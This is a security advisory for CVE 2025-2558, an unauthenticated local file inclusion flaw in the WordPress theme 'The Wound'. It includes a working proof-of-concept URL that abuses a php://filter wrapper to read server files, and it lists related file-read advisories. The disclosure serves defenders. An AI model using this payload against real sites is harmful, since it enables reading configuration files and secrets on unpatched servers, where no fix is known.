The Wound <= 0.0.1 – Unauthenticated LFI | CVE 2025-2558 | Theme Vulnerabilities

Description

The theme does not validate some parameters before using them to generate paths passed to include function/s, allowing unauthenticated users to perform LFI attacks and download arbitrary file from the server

Proof of Concept

Access the following URL:

https://example.com/wp-content/themes/the-wound/force_download.php?file=php://filter/convert.base64-encode/resource=force_download.php

The response contains base64-encoded content of the force_download.php file.
Decode the base64 content to view the source code of the file. Use any base64 decoding tool or command:

echo <base64-content> | base64 -d

Affects Themes

No known fix

References

CVE

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Aly Khaled

Submitter

Aly Khaled

Submitter website

https://0x41ly.github.io/

Submitter twitter

Verified

Yes

WPVDB ID

6a8e1c89-a01d-4347-91fc-ba454784b153

Timeline

Publicly Published

2025-04-03 (about 9 months ago)

Added

2025-04-03 (about 9 months ago)

Last Updated

2025-04-03 (about 9 months ago)

Other

Published

Title

Published

2025-04-07

Title

Nomupay Payment Processing Gateway < 7.1.6 - Authenticated (Subscriber+) Arbitrary File Download

Published

2024-09-25

Title

Advanced File Manager < 5.2.9 - Authenticated (Administrator+) Local JavaScript File Inclusion via fma_locale

Published

2018-03-16

Title

Site Editor <= 1.1.1 - Local File Inclusion (LFI)

Published

2024-11-12

Title

WordPress User Extra Fields < 16.7 - Unauthenticated Arbitrary File Deletion

Published

2024-12-02

Title

ARForms <= 6.4.1 - Directory Traversal to Authenticated (Subscriber+) Arbitrary File Read